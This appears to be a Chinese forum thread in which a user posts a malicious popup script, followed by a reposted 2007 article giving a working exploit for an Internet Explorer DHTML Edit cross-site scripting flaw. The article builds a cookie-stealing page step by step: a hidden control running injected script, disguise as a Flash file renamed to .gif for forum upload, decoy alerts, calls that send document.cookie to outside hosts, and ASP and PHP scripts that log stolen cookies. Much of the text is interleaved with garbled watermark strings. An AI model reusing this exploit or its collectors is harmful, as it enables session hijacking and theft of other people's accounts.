function shellscript()
{
   var now = new Date();
   var sec = now.getSeconds();
   var poll = sec % 3;
   var popurl = "";
   if(poll == 0)
   {
    popurl = "http://www.singbomb.com/hotsingerpp.htm";
   }
   else
   {
    popurl = "http://www.thethirdmedia.com/pc/pjbj/";
   }
  window.focus();
  open(popurl,"_blank","scrollbar=no");

这就是毒

我怎么看下面还有毒，干脆撇开这些代码别用啦。

这段就是恶意代码来的,想研究一下

MSIE DHTML Edit跨站脚本漏洞
上一篇 / 下一篇  2007-12-12 20:31:03    文章类型： 转载

查看( 30 ) / 评论( 0 ) / 评分( 0 / 0 )
微软在去年发布了MSIE DHTML Edit控件跨站脚本漏洞，但是圈内一直没有公布出好用的EXP，害得一帮新手叫苦不迭，别急，这不是为大家送来了大餐吗？！

[受影响系统]
s i O*~"V,F(s q0Microsoft Internet Explorer 6.0ZDNetChina空间.z _%s0W A a R
- Microsoft Windows XP Professional SP1
n5h9G6R.Q a"{ o i7w0- Microsoft Windows XP ProfessionalZDNetChina空间)K)T+s*M8W P
- Microsoft Windows XP Home SP1
U7i z `"Q _0k)B M-e0- Microsoft Windows XP Home
8q.| w"W%x7? ^ T&I0- Microsoft Windows ME
M6p M5w h2L p h0- Microsoft Windows 98 SEZDNetChina空间 \0^ W A*e D
- Microsoft Windows 98
W v:? N6|(`0- Microsoft Windows 2000

[漏洞描述]
f)}(M H ] x a0Microsoft Internet Explorer DHTML edit控件不正确过滤部分数据，远程攻击者可以利用这个漏洞进行跨站脚本攻击，获得敏感信息。DHTML编辑控件存在一个安全问题可被父窗口访问，包括Script函数，攻击者使用exeScript直接注入javascript到控件，当目标用户打开恶意链接时，会导致恶意脚本代码执行，泄露敏感信息。ZDNetChina空间)V g M Q(D
看来只能影响到IE 6.0版本，并且对Windows XP SP2没有作用，不过没有给XP打SP2补丁的用户不在少数，这个漏洞的利用价值还是蛮大的。ZDNetChina空间 h3m H5A @ }!e
由于我使用的是Windwos XP SP1正好存在这个漏洞，我们就先来测试一下吧，在本地建立如下内容的HTML页面：ZDNetChina空间2k.p5y D'J9y:^
<html>
k X e l T"] ` Q B0<head>
R T;g O { S8Q0<title>测试</title>ZDNetChina空间%R$u | Y Y { o g7I
</head>
g7{ R8L A(J5H y0<body nload="setTimeout('x.DOM.body.innerHTML=\'<b>正在装载，请稍后ZDNetChina空间6x |6A h k @ ~
++++++++++++++</b>\'');setTimeout('main()',1000)">ZDNetChina空间+m p G S-S
<object
v @ K5S#Q.g*B0id="x"ZDNetChina空间't p1z ^ y u;c
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
!N E*k5B x t,T0V ?0width="800"ZDNetChina空间!i o X \ `
height="600"
S-V/L&^%Y;C B q0align="middle"
` G8g3A,V y v C e0>ZDNetChina空间 O J*A T p R8h M
<PARAM NAME="ActivateApplets" VALUE="1">ZDNetChina空间/e1o x c l j4{ v%k M e
<PARAM NAME="ActivateActiveXControls" VALUE="1">ZDNetChina空间 z \&]&D+d8c1q
</object>ZDNetChina空间 j S7w j c ~ A.w
<SCRIPT>
@"t)w&@ M&U [0function shellscript()ZDNetChina空间 V,]'S4D1?:~
{ZDNetChina空间 K5c-K)q k p | g G
window.name="poorchild";ZDNetChina空间&m$@;n&E U l&c t A
open("http://www.hacker.com.cn/newbbs/announcements.asp?
}-m z+Z e @0action=showone&boardid=0","poorchild");ZDNetChina空间 k*J.e2L R7M h(@
}ZDNetChina空间 w Y Z:m o)}8q0r8p q
function main()
|*c)M O y \.` K3\0{ZDNetChina空间 ] G)Z n9T {6A9x e p
x.DOM.Script.execScript(shellscript.toString());ZDNetChina空间0h"[ Y1i$R M
x.DOM.Script.setTimeout("shellscript()");ZDNetChina空间5C b(N u/w0p9K
alert('等等++++++++++++++++++++++++++');ZDNetChina空间 L p%K!q/F)d*u l {-C!F
x.DOM.Script.execScript('alert(document.cookie)');
5W9u G,| C-\ W3y0}ZDNetChina空间 A w*R n u N)i g
</SCRIPT>

</body>ZDNetChina空间 `-S+y0\ r V G v
</html>
9m M o'`!~+k l0用IE浏览器打开，如果你的系统存在这个漏洞，看出现了什么。ZDNetChina空间!v W8T7N;g b2W7{ a
呵呵，弹出了我在黑防论坛上的Cookie信息。不过这个页面利用起来很不方便，并且成功率不高，如果没等到DHTML控件加载完毕就点击确定，是不会弹出任何Cookie信息的。ZDNetChina空间 m k l6Q ~8[ | o
没等到页面加载完毕就点击弹出的第一个确定，一定会攻击失败，看来还是不足的。我们来对这个页面进行一下补充和修改吧，使得它成为一个成功率高的偷取Cookie信息的网页，好了，我们现在开始动手。
8x)@"b%I3] P3W A0为了增加加载时间我们先将setTimeout('main()',1000)中的参数改大一些，就设成10000把，也就是10秒，够长了。虽然页面显示着正在加载，但状态栏中却显示着完毕，我们来修改状态栏的文字，加入如下的函数：
O o p W s z f0function clock() {
4z o#O ^ q @ c:d0var title="正在装载，请稍后++++++++++++++";ZDNetChina空间 i7S G k | ])_,U P
status=title;ZDNetChina空间2w U$?+s g-x
}
+n$T i1k \;U G)j0为了尽可能的诱使浏览者去打开这个页面，我们把它改名成.swf格式的文件，即把此页面伪装成一个Flash文件。在页面中加入：ZDNetChina空间 _ h E ^(P H
<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="800" height="600">
I O:x ~ t R O;c K0<param name="movie" value="http://www.istacey.net/project/exorcist/icon/promo3.swf">
'V([(\ _2D V C0<param name="quality" value="High">
[%Y o N1l7`0<embed src="http://www.istacey.net/project/exorcist/icon/promo3.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="489" height="76" quality="High"></object>
#D y R I+@ F B \ T1I z0同时隐藏DHTML控件，即将DHTML空间的width，height属性设置成0。为了将Cookie发送，我们添加如下脚本：ZDNetChina空间 ?%u f o:y U5f
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)");ZDNetChina空间7} B _0o2G)N
这是为了测试方便，我将浏览者的Cookie信息发送到了网上一个发表评论的地方了。最终的测试页面是：
R ~0p A x3L g B G0<html>ZDNetChina空间 g)I h m;H ~ r,\+D
<head>ZDNetChina空间 Q S:C+E4Q9H)~
<title>测试</title>ZDNetChina空间 r,] T)@4})l
</head>ZDNetChina空间 c6A;z ?2D c
<body nload="setTimeout('x.DOM.body.innerHTML=\'<b>正在装载，请稍后++++++++++++++</b>\'');clock();setTimeout('main()',10000)">ZDNetChina空间*G!g s-z Q |
<objectZDNetChina空间 z u ? Q/E p L7M
id="x"ZDNetChina空间5y Z U+N [ g [
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
6_ X!F P s1m#S ]-]0width="0"
| D b x5I t4J0height="0"
t:r"y T n&B0align="middle"ZDNetChina空间 @ \6_;S |$i&l:x w u
>
0R5a t r o M e q H0<PARAM NAME="ActivateApplets" VALUE="1">
o)R ] l w d | f0<PARAM NAME="ActivateActiveXControls" VALUE="1">
M!z/@ e v g-m4y W0</object>ZDNetChina空间 B g a;? B r
<SCRIPT>ZDNetChina空间 O T h;F s3K)u P
function clock() {
8N [ b4R |+]0var title="正在装载，请稍后++++++++++++++";ZDNetChina空间7q [ [ W*P W0h F `
status=title;ZDNetChina空间8v H s3I;B
}

ZDNetChina空间 L Y*m @:_ \ { v
function shellscript()
K ` R%W3N0[0{
4{.m%M W*O:w W&j:E E u z0window.name="poorchild";
3o4R*U"{ _&^0open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild");ZDNetChina空间 g&g Q9A E w8C Q.A F5`3v
}
&@ \+I0{'c B z ]0function main()
L h j J i9`8^ f m P&M P0{ZDNetChina空间9t*W _ | R t a%q
x.DOM.Script.execScript(shellscript.toString());ZDNetChina空间,d;D L }8k W
x.DOM.Script.setTimeout("shellscript()");ZDNetChina空间 U*n'^ B.j7l
alert("游戏名称：神秘祭坛\n");ZDNetChina空间6f f ~ Q%t/L
alert("测试通过者拥有着超人的观察力！\n");
a*{ e!O:S T p {7h$?"w0alert("全世界只有１０个人可以全部找出！\n");
` M U6n O Z O I0alert("相信你就是这１０个人中的一员\n");ZDNetChina空间 b R.|,f6m;r
alert("祝你好运++++++++++++++++++++\n");
H o8v.d7x3]5v F t0alert("务必在找到不同后点击确定！！\n");ZDNetChina空间 e W4i7D [,M"v
//x.DOM.Script.execScript('alert(document.cookie)');ZDNetChina空间 ? ~ L }4u x a$| [
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)");ZDNetChina空间,j%O l |#C D
}ZDNetChina空间 E y o3u I S,r d%D"^
</SCRIPT>

<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="800" height="600">ZDNetChina空间.Z G ~ \ f'r S b x
<param name="movie" value="http://www.istacey.net/project/exorcist/icon/promo3.swf">
*C0k T E'_ J E/r h i N |0<param name="quality" value="High">ZDNetChina空间 p8d9T.k%M7J
<embed src="http://www.istacey.net/project/exorcist/icon/promo3.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="489" height="76" quality="High"></object>ZDNetChina空间7r G;V+R.Z#p+n;x K!]
</body>ZDNetChina空间2o/y/l S"s p q.M
</html>ZDNetChina空间 H t"j o o3~ z s
其中的http://www.istacey.net/project/exorcist/icon/promo3.swf是朋友发给我的地址，把我给下了一跳，不过没想到我却用它来骗稿费了，呵呵。ZDNetChina空间6[ a!X-r7h W
为了测试，赶快去黑防论坛发表一篇文章，要有吸引力才行。ZDNetChina空间+T9? {+G3i+w X
够有吸引力的了吧？我猜中招的一定不少！其实我们可以把以上的攻击文件改名成.swf，为了在论坛上传方便(不允许swf格式)，我改名为gif格式了。
@+Y/G | Q v)q _ M G0由于它是利用的IE漏洞，这个页面的地址可以在任意地方，不过注意：ZDNetChina空间1A'U k+S!f h'e
function shellscript()
T n.x j d0{
9l \9Q A M7y"P0F s L0window.name="poorchild";ZDNetChina空间%p5? a u"k&`8l6l @
open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild");
*u I/`,h \ ` T E ~ _ l U0}
%N y.c7o T.r } ]+t b!A0这个函数中定义了我们要偷取浏览者机器中站点的Cookie信息，我设置的是黑防论坛的，大家可以换成要攻击的论坛。同时这个页面也要选取内容少的页面，最好不要带图片，以加快载入时间。ZDNetChina空间 L Q I Z#O7D+G \
好，我自己就先来看看效果吧。

看来是成功了，为了不让浏览者看到自己的的Cookie信息，可以把它发送到自己定制的ASP页面，方法是在支持ASP和FSO组件的空间上建立以下页面：
$C R%o4z7c"S1\ v6n q0<%
8h j u2o e H c0testfile=Server.MapPath("cookie.txt")
O Z*q U*u S:g e [ z0cookie=Request("cookie")ZDNetChina空间 r/M ]!g I Q/l-V
set fs=server.CreateObject("scripting.filesystemobject")ZDNetChina空间8j v(@ m-l3Z U6s
set thisfile=fs.OpenTextFile(testfile,8,True,0)
r-d r&z9B!`:X%o m1q d0thisfile.WriteLine(""&cookie& "")
8c |-G G \#^0thisfile.close
+X ~8m i X s!G0set fs = nothing
4g*H;t f O [ \ Q N!A f0%>
F b B9u j7q9^#I0将它命名为Cookie.asp，注意修改以下内容：
H%A6};P3B/N-k ?0x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)");
q&` r r3t r3?*m0改为ZDNetChina空间 m4E'| z;q n
x.DOM.Script.execScript("window.open('http://youwebsite.com/cookie.asp?cookie= '+document.cookie)");ZDNetChina空间 x ~ v-X e%n#d&n
或在支持PHP的空间建立以下页面：ZDNetChina空间 o0q;L I U"E-B W
<?phpZDNetChina空间 C7~;J I;Q V Y v
$info = getenv("QUERY_STRING");ZDNetChina空间/y4U(E L r'A/~'K B
if ($info) {ZDNetChina空间 l3S C*i H \
$fp = fopen("info.txt","a");ZDNetChina空间+?:e I)S3^ m ` [ n ]4y
fwrite($fp,$info."\n");ZDNetChina空间 G C M z h*y ^ Y
fclose($fp);
8L P I J y N$a Q R0}
A q6Z ?!s8N6P ^0header("Location:http://wwwhacker.com.cn");
(F!L G:{#x ^ w3?0这样通过这个漏洞，我们就可以偷取到任何论坛的Cookie信息了，不管论坛做了多么安全，只要浏览者IE存在此漏洞，就可成功获取别人的Cookie，这可称得上是论坛杀手了！

有没有人向我解释一下箇中原理?